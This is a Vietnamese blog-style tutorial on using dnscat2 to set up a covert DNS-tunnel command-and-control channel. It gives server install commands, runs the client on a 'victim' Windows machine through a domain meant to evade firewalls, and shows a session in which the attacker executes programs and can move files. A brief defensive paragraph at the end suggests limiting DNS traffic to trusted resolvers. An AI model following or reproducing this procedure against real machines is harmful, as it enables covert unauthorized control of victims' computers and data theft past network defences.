1. trên máy chủ linux, có khả năng truy cập được internet.
2. máy chủ chạy ubuntu, sử dụng quyền root, chạy các lệnh
sau:
# apt-get update
# apt-get -y install ruby-dev git make g++
# gem install bundler
# git clone https://github.com/iagox86/dnscat2.git
# cd dnscat2/server
# bundle install
3. di chuyển đến folder vừa cài, chạy lệnh
# ruby ./dnscat2.rb (# ruby ./dnscat2.rb abc.com //nếu có đăng ký một tên miền, có tên miền thường nhằm mục đích dễ đánh lừa firewall hơn)
sau khi chạy dnscat2 server thì trên
server sẽ lắng nghe trên port 53, lắng nghe phản hồi từ dnscat2 client từ nạn
nhân
4. nếu máy nạn nhân chạy windows, chúng ta download dnscat2 client tại đây5. trên máy windows nạn nhân chạy lệnh
(dnscat2-win32.exe abc.com)
Trong đó địa chỉ ip trên là địa chỉ của dnscat2 server.
6. ngay sau nạn nhân chạy lệnh trên, thì bên dnscat2 server
sẽ thông báo rằng đã nhận được kết nối từ nạn nhân
# ruby ./dnscat2.rb (# ruby ./dnscat2.rb abc.com)
Starting Dnscat2 DNS server on 0.0.0.0:53 [domains = n/a]...
No domains were selected, which means this server will only respond to direct queries (using --host and --port on the client)
dnscat2> New session established: 16059
dnscat2>
7. lúc này kẻ tấn công đã kiểm soát được máy nạn nhân, và có
thể thực thi lệnh tùy ý ví dụ như chạy notepad…
dnscat2> session -i 16059
Welcome to a command session!
Use 'help' for a list of commands or ^z for the main menu
dnscat [command: 16059]> exec notepad.exe
Sent request to execute
dnscat [command: 16059]>
dnscat2 còn hỗ trợ download, upload file đến máy nạn nhân.
Lúc này nếu chúng ta bật wireshark lên để kiểm tra sẽ thấy,
mỗi một truy vân dns đều kèm theo một số các lưu lượng không bình thường trong
đó, chính vì vậy mà đã qua mặt được firewall(đa số các firewall đều cho truy vấn
và nhận phản hồi dns)
8. Cách phòng chống:
Chúng ta có thể hạn chế bớt lưu lượng truyền đi trên một đơn vị thời
gian nào đó, chỉ cho phép các truy vấn và nhận phản hồi dns đến các hệ thống
dns đáng tin cậy
Không có nhận xét nào:
Đăng nhận xét